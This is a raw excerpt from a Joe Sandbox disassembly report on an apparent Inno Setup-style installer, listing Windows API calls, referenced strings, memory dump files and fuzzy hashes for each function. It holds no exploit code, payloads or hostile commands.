                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                              Strings
                                                                              • Failed to set permissions on registry key (%d)., xrefs: 00472610
                                                                              • Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3
                                                                              • Setting permissions on registry key: %s\%s, xrefs: 004725AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                              • API String ID: 1452528299-4018462623
                                                                              • Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                              • Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
                                                                              • Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                              • Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 262959230-0
                                                                              • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                              • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                              • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                              • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                              APIs
                                                                              • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                              • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                              • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                              • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                              • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A122A18830$A480
                                                                              • String ID:
                                                                              • API String ID: 3325508737-0
                                                                              • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                              • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                              • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                              • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                              APIs
                                                                              • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                              • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                              • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$NameOpenResourceUniversal
                                                                              • String ID: Z
                                                                              • API String ID: 3604996873-1505515367
                                                                              • Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                              • Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
                                                                              • Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                              • Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A
                                                                              APIs
                                                                              • SetRectEmpty.USER32(?), ref: 0044C8A2
                                                                              • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
                                                                              • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DrawText$EmptyRect
                                                                              • String ID:
                                                                              • API String ID: 182455014-2867612384
                                                                              • Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                              • Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
                                                                              • Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                              • Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
                                                                                • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                              • SelectObject.GDI32(?,00000000), ref: 0042EE35
                                                                              • 73A1A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A480A570CreateFontIndirectObjectSelect
                                                                              • String ID: ...\
                                                                              • API String ID: 2998766281-983595016
                                                                              • Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                              • Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
                                                                              • Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                              • Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69
                                                                              APIs
                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00454848
                                                                              • GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859
                                                                                • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryErrorExecuteLastShellSystem
                                                                              • String ID: <$SuG
                                                                              • API String ID: 893404051-1504269210
                                                                              • Opcode ID: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                              • Instruction ID: e58c708146c2f721f38e64faa2aac8e88425893723770a95bfdd45a03fe75b0c
                                                                              • Opcode Fuzzy Hash: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                              • Instruction Fuzzy Hash: 7D218574A00249ABDB10EF65C88269E7BE8EF49349F50403AF844EB381D7789D498B98
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                              • ExitProcess.KERNEL32 ref: 00404E0D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ExitMessageProcess
                                                                              • String ID: Error$Runtime error at 00000000
                                                                              • API String ID: 1220098344-2970929446
                                                                              • Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                              • Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
                                                                              • Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                              • Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF
                                                                              APIs
                                                                                • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
                                                                              • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                              • String ID: LoadTypeLib$RegisterTypeLib
                                                                              • API String ID: 1312246647-2435364021
                                                                              • Opcode ID: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                              • Instruction ID: e41936e4c8b07abfc49a8f10cd7ccd4a21eee7bf761b45698a75813e6285fe04
                                                                              • Opcode Fuzzy Hash: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                              • Instruction Fuzzy Hash: 59119631B00A04AFDB11DFA6CD62A5FB7ADEB89705F10847ABC04D3652DB789E04CA54
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
                                                                              • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403
                                                                              Strings
                                                                              • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392
                                                                              • Failed to create DebugClientWnd, xrefs: 004563CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                              • API String ID: 3850602802-3720027226
                                                                              • Opcode ID: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                              • Instruction ID: 9b4fe9b07e62f64c95e3ed8797323406b80950c852a807cd7dd65319169fa691
                                                                              • Opcode Fuzzy Hash: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                              • Instruction Fuzzy Hash: 1111E3B06042506FD300AB699C81B5F7BA89B56309F45443BF984DF383D3798C18CBAE
                                                                              APIs
                                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                              • GetFocus.USER32 ref: 004771FF
                                                                              • GetKeyState.USER32(0000007A), ref: 00477211
                                                                              • WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FocusMessageStateTextWaitWindow
                                                                              • String ID: Wnd=$%x
                                                                              • API String ID: 1381870634-2927251529
                                                                              • Opcode ID: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                              • Instruction ID: 1bcd60996d2698ed373ebf422e897d28d135c5275452f214efeb8338eb806bda
                                                                              • Opcode Fuzzy Hash: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                              • Instruction Fuzzy Hash: A611CA30604204AFC701EFA9DC41ADE77F8EB49704B9184F6F418E3252D73C6D10CA6A
                                                                              APIs
                                                                              • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$LocalSystem
                                                                              • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                              • API String ID: 1748579591-1013271723
                                                                              • Opcode ID: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                              • Instruction ID: 0ff0b3c23c5ed0256b313d7d525d52e9a24b5728abf6314cf281cf193483f13b
                                                                              • Opcode Fuzzy Hash: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                              • Instruction Fuzzy Hash: 4311F8A090C3909ED340DF2AC44432BBAE4AB89704F04892EF9D8D6381E779C948DB77
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                              • API String ID: 47109696-2631785700
                                                                              • Opcode ID: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                              • Instruction ID: 2bdf3aef2c60deecc2fc1a5dc8a42cc53f0a1f71867dabe890c8ddf4abdcbedd
                                                                              • Opcode Fuzzy Hash: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                              • Instruction Fuzzy Hash: 3AF0A4B17001109BDB10EB1AE845F5B628CDBD1316F20403FF581E7296CE7CDC06CA9A
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
                                                                              • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C
                                                                              Strings
                                                                              • CSDVersion, xrefs: 00481F70
                                                                              • System\CurrentControlSet\Control\Windows, xrefs: 00481F46
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                              • API String ID: 3677997916-1910633163
                                                                              • Opcode ID: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                              • Instruction ID: c869957850822339a6d2b86bec0dd1f4db8a349efa053aa20552817ac18695c5
                                                                              • Opcode Fuzzy Hash: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                              • Instruction Fuzzy Hash: 94F01975E4020DAADF10EAD18C45BAF73BCAB04708F104967FB10E7290E779AA45CB5A
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                              • API String ID: 1646373207-4063490227
                                                                              • Opcode ID: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                              • Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
                                                                              • Opcode Fuzzy Hash: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                              • Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                              • API String ID: 1646373207-260599015
